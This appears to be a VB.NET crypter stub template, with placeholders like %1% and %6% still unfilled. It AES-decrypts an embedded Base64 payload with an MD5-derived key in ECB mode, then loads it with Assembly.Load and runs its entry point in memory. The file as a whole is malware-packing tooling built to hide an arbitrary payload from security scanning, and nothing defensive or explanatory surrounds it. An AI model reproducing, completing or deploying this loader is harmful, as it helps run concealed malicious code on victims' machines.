Imports System.Security.Cryptography
Imports System.Text

Module rNEXDSSyvIx
    Sub main()

        Dim %1% As String = "%2%"
        Dim %3% As Byte() = Convert.FromBase64String(%6%(%1% , "%8%"))



        Dim %4% As System.Reflection.Assembly = System.Reflection.Assembly.Load(%3% )
        %4%.EntryPoint.Invoke(Nothing, Nothing)


    End Sub
    Public Function %6%(ByVal input As String, ByVal pass As String) As String
        Dim AES As New RijndaelManaged
        Dim Hash_AES As New MD5CryptoServiceProvider
        Dim decrypted As String = ""
        Try
            Dim hash(31) As Byte
            Dim temp As Byte() = Hash_AES.ComputeHash(System.Text.ASCIIEncoding.ASCII.GetBytes(pass))
            Array.Copy(temp, 0, hash, 0, 16)
            Array.Copy(temp, 0, hash, 15, 16)
            AES.Key = hash
            AES.Mode = CipherMode.ECB
            Dim DESDecryptor As ICryptoTransform = AES.CreateDecryptor
            Dim buffer As Byte() = Convert.FromBase64String(input)
            decrypted = ASCIIEncoding.ASCII.GetString(DESDecryptor.TransformFinalBlock(buffer, 0, buffer.Length))

        Catch ex As Exception

        End Try
        Return decrypted
    End Function

End Module